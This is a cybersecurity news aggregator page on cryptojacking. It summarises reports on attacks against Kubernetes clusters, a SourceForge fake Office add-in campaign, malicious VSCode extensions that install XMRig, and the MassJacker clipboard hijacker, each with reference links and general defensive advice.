CyberSecurity news

FlagThis - #cryptojacking

@www.microsoft.com //

Cryptojacking Attacks Target Unsecured Kubernetes Clusters - Microsoft Threat Intelligence reports a rise in attacks targeting unsecured Kubernetes clusters for illicit cryptocurrency mining, exploiting unsecured workload identities and inactive accounts.
Microsoft Threat Intelligence is reporting a significant rise in cyberattacks targeting unsecured Kubernetes clusters. These attacks are primarily aimed at illicit cryptocurrency mining, with threat actors exploiting vulnerabilities such as unsecured workload identities and inactive accounts to gain unauthorized access to containerized environments. Data from Microsoft indicates that a concerning 51% of workload identities remained inactive in the past year, creating numerous potential entry points for attackers. The increasing adoption of containers-as-a-service among organizations has expanded the attack surface, making it more attractive for cybercriminals seeking to profit from stolen computing resources.

The dynamic nature of Kubernetes environments poses significant challenges for security teams. The rapid deployment and scaling of containers make it difficult to detect runtime anomalies and trace the origins of security breaches. Attackers often exploit misconfigured resources, outdated container images, inadequate network segmentation, and overly permissive access controls to infiltrate these environments. Observed attack vectors include compromising cloud credentials, deploying malicious container images, exploiting the Kubernetes API, conducting node-level and pod escape attacks, and injecting unauthorized network traffic. A recent example involved the use of the AzureChecker.exe tool to launch password spray attacks against cloud tenants, leading to the creation of cryptomining containers within compromised resource groups.

To combat these evolving threats, Microsoft has been working with MITRE to update the Kubernetes threat matrix and the ATT&CK for Containers matrix. This provides a structured framework for organizations to systematically assess and mitigate attack surfaces in containerized environments. Security best practices highlighted include implementing immutable container policies, enforcing strong authentication, employing rigorous vulnerability management, using admission controllers, establishing image assurance policies, and continuously monitoring API activity. Furthermore, a Docker malware campaign has been discovered exploiting Teneo Web3 nodes by faking heartbeat signals to earn crypto, showcasing the diverse methods attackers are using to generate revenue from compromised container environments.

Recommended read:
References :
  • www.microsoft.com: Understanding the threat landscape for Kubernetes and containerized assets
  • Cyber Security News: Cyberpress: Unsecured Kubernetes Clusters Targeted by Threat Actors for Crypto Mining
  • The Hacker News: Docker Malware Exploits Teneo Web3 Node to Earn Crypto via Fake Heartbeat Signals
  • Microsoft Security Blog: Understanding the threat landscape for Kubernetes and containerized assets
@gbhackers.com //

Attackers Abuse SourceForge to Distribute Cryptocurrency Malware - Attackers are exploiting SourceForge to distribute malware disguised as Microsoft Office add-ins, installing a cryptocurrency miner and ClipBanker Trojan, primarily targeting Russian-speaking users.
Cybercriminals are exploiting SourceForge, a legitimate software hosting and distribution platform, to spread malware disguised as Microsoft Office add-ins. Attackers are using SourceForge's subdomain feature to create fake project pages, making them appear credible and increasing the likelihood of successful malware distribution. One such project, named "officepackage," contains Microsoft Office add-ins copied from a legitimate GitHub project, but the subdomain "officepackage.sourceforge[.]io" displays a list of office applications with download links that lead to malware. This campaign is primarily targeting Russian-speaking users.

The attackers are manipulating search engine rankings to ensure these fake project pages appear prominently in search results. When users search for Microsoft Office add-ins, they are likely to encounter these malicious pages, which appear legitimate at first glance. Clicking the download button redirects users through a series of intermediary sites before finally downloading a suspicious 7MB archive named "vinstaller.zip." This archive contains another password-protected archive, "installer.zip," and a text file with the password.

Inside the second archive is an MSI installer responsible for creating several files and executing embedded scripts. A Visual Basic script downloads and executes a batch file that unpacks additional malware components, including a cryptocurrency miner and the ClipBanker Trojan. This Trojan steals cryptocurrency by hijacking cryptocurrency wallet addresses. Telemetry data shows that 90% of potential victims are in Russia, with over 4,604 users impacted by this campaign.

Recommended read:
References :
  • cyberpress.org: Threat Actors Leverage SourceForge Platform to Spread Malware
  • gbhackers.com: Attackers Exploit SourceForge Platform to Distribute Malware
  • Securelist: Attackers distributing a miner and the ClipBanker Trojan via SourceForge
  • The Hacker News: The Hacker News Article on Cryptocurrency Miner and Clipper Malware Spread via SourceForge
  • Cyber Security News: Threat Actors Leverage SourceForge Platform to Spread Malware
  • gbhackers.com: GBHackers article on Attackers Exploit SourceForge Platform to Distribute Malware
  • BleepingComputer: Threat actors are abusing SourceForge to distribute fake Microsoft add-ins that install malware on victims' computers to both mine and steal cryptocurrency.
  • The DefendOps Diaries: Unmasking the SourceForge Malware Campaign: A Deceptive Attack on Users
  • bsky.app: Threat actors are abusing SourceForge to distribute fake Microsoft add-ins that install malware on victims' computers to both mine and steal cryptocurrency.
  • BleepingComputer: Threat actors are abusing SourceForge to distribute fake Microsoft add-ins that install malware on victims' computers to both mine and steal cryptocurrency.
  • www.bleepingcomputer.com: Threat actors are abusing SourceForge to distribute fake Microsoft add-ins that install malware on victims' computers to both mine and steal cryptocurrency.
  • bsky.app: Threat actors are abusing SourceForge to distribute fake Microsoft add-ins that install malware on victims' computers to both mine and steal cryptocurrency.
  • securityonline.info: For many developers, SourceForge has long been a cornerstone of open-source collaboration — a trusted hub to host and distribute software. But for cybercriminals, it has recently become a platform to stage deception.
  • securityonline.info: SourceForge Used to Distribute ClipBanker Trojan and Cryptocurrency Miner
  • Cyber Security News: Cybersecurity News article on SourceForge malware distribution
  • Tech Monitor: Threat actors exploit SourceForge to spread fake Microsoft add-ins
@blog.extensiontotal.com //

Malicious VSCode Extensions Distribute Cryptominers - Multiple Visual Studio Code extensions have been identified as malicious, infecting systems with the XMRig cryptominer by downloading and executing a PowerShell loader.
Multiple malicious Visual Studio Code (VSCode) extensions have been identified, posing a significant threat to developers. Discovered on April 4, 2025, these extensions, found on the Microsoft VSCode Marketplace, masquerade as legitimate development tools. They include names such as "Discord Rich Presence" and "Rojo – Roblox Studio Sync" and operate by surreptitiously downloading and executing a PowerShell script. This script then disables Windows security features, establishes persistence through scheduled tasks, and installs the XMRig cryptominer, designed to mine Ethereum and Monero, all without the user's knowledge.

The attack employs a sophisticated multi-stage approach. Once installed, the malicious extensions download a PowerShell loader from a remote command-and-control (C2) server. This loader then disables security services to evade detection and deploys the XMRig cryptominer to exploit the victim's system resources for cryptocurrency mining. Notably, the attackers even install legitimate versions of the extensions they impersonate, a tactic designed to maintain the appearance of normalcy and prevent users from suspecting any malicious activity, further highlighting the deceptive nature of this campaign. Researchers at ExtensionTotal uncovered the malicious extensions and noted many had artificially inflated install counts designed to reduce suspicion.

This incident underscores the growing threat of supply chain attacks targeting development environments. By exploiting vulnerabilities in the VSCode Marketplace, malicious actors can distribute malware to a wide range of developers. The fact that these extensions were able to bypass Microsoft's safety review processes raises concerns about the security of the marketplace. Users are strongly advised to exercise caution when installing VSCode extensions, carefully reviewing publisher details and extension permissions before installation. This serves as a reminder of the importance of robust security measures and constant vigilance to protect against evolving cyber threats.

Recommended read:
References :
  • blog.extensiontotal.com: reports on a VSCode extension cryptojacking campaign.
  • Secure Bulletin: reports on the malicious VSCode extensions and a growing threat to developers
  • The DefendOps Diaries: Discusses safeguarding VSCode and addressing the threat of malicious extensions.
  • BleepingComputer: Details how malicious VSCode extensions infect Windows with cryptominers.
  • www.csoonline.com: CSOOnline reports the malicious tools.
  • securebulletin.com: Malicious VSCode extensions: a growing threat to developers
  • bsky.app: Nine VSCode extensions on Microsoft's Visual Studio Code Marketplace pose as legitimate development tools while infecting users with the XMRig cryptominer to mine Ethereum and Monero.
  • www.scworld.com: Cryptojacking facilitated by nefarious VS Code extensions
  • aboutdfir.com: Malicious VSCode extensions infect Windows with cryptominersÂ
  • securityonline.info: Malicious VSCode Extensions Caught Mining Crypto with XMRig
Pierluigi Paganini@Security Affairs //

MassJacker Clipper Targets Pirated Software Users - MassJacker is a new cryptojacking malware that targets users who download pirated software, acting as a clipper to replace cryptocurrency wallet addresses with attacker-controlled ones.
Cybersecurity researchers at CyberArk have uncovered a new cryptojacking malware campaign called MassJacker. This sophisticated malware targets users who download pirated software, particularly from websites known for distributing malware, such as pesktop[.]com. MassJacker operates as a clipboard hijacker, monitoring the Windows clipboard for copied cryptocurrency wallet addresses.

When a user copies an address, the malware stealthily replaces it with one controlled by the attackers, resulting in the victim unknowingly sending cryptocurrency to the malicious actors instead of the intended recipient. The investigation revealed that MassJacker has been associated with over 750,000 unique cryptocurrency addresses, with one wallet holding over $300,000.

Recommended read:
References :

Posts

Blogs

Research Tools